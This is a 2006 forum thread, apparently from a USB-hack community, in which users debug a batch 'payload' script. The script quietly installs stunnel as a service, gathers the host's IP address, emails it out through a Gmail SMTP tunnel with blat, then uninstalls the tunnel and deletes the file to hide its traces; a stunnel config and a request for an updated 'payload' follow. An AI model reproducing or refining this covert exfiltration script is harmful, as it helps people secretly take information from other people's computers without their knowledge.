Masterpyro Posted November 17, 2006 Share Posted November 17, 2006 ERROR: 2006.11.17 12:56:32 LOG5[320:2596]: stunnel 4.11 on x86-pc-mingw32-gnu WIN32+IPv6 with OpenSSL 0.9.7f 22 Mar 2005 2006.11.17 12:56:32 LOG5[320:3480]: No limit detected for the number of clients 2006.11.17 12:56:32 LOG3[320:3480]: listen: Invalid argument (WSAEINVAL) (10022) 2006.11.17 12:56:32 LOG3[320:3480]: Server is down Send.cmd @echo off :start :: Configure Email Options SET emailfrom= xxxxxxxxxxxxxxxxxxxxx@xxxxxxxx SET emailto= xxxxxxxxxxxxxxxxxxxxxxx@xxxxxxxx SET password= xxxxxxxxxxxxx SET subject= %computername%_ip call getip.cmd stunnel-4.11.exe -install -quiet net start stunnel GOTO sendfiles :sendfiles for %%i in (ip.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents del ip.txt ping -n 3 localhost > NUL GOTO end :end anyone know whats up with this? and should it be send.bat or send.cmd? Quote Link to comment Share on other sites More sharing options...
remkow Posted November 17, 2006 Share Posted November 17, 2006 It should be send.bat. Did you configure stunnel.conf properly? Quote Link to comment Share on other sites More sharing options...
Masterpyro Posted November 17, 2006 Author Share Posted November 17, 2006 yes i think so client = yes taskbar = no [SMTP Gmail] accept = 127.0.0.1:1099 connect = smtp.gmail.com:465 a few screenshots: http://i15.tinypic.com/332merl.jpg http://i15.tinypic.com/4dxo8w9.jpg Quote Link to comment Share on other sites More sharing options...
remkow Posted November 18, 2006 Share Posted November 18, 2006 Try using the most recent version of stunnel, it might help.. http://www.stunnel.org/download/binaries.html Quote Link to comment Share on other sites More sharing options...
u3man2007 Posted November 24, 2006 Share Posted November 24, 2006 I am having similar stunnel problems as well when I run the hack on a limited account. "Failed to create a new service and Failed to open the service." I wondered if I upgraded stunnel to the newest version if that would solve the problem, but I am not too sure if this would work. (not sure how to do that either) Let me know what you guys suggest. :? Could somebody also post a new payload with the upgraded version of stunnel as well as all of the other software involved with it. I would appreciate it. :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.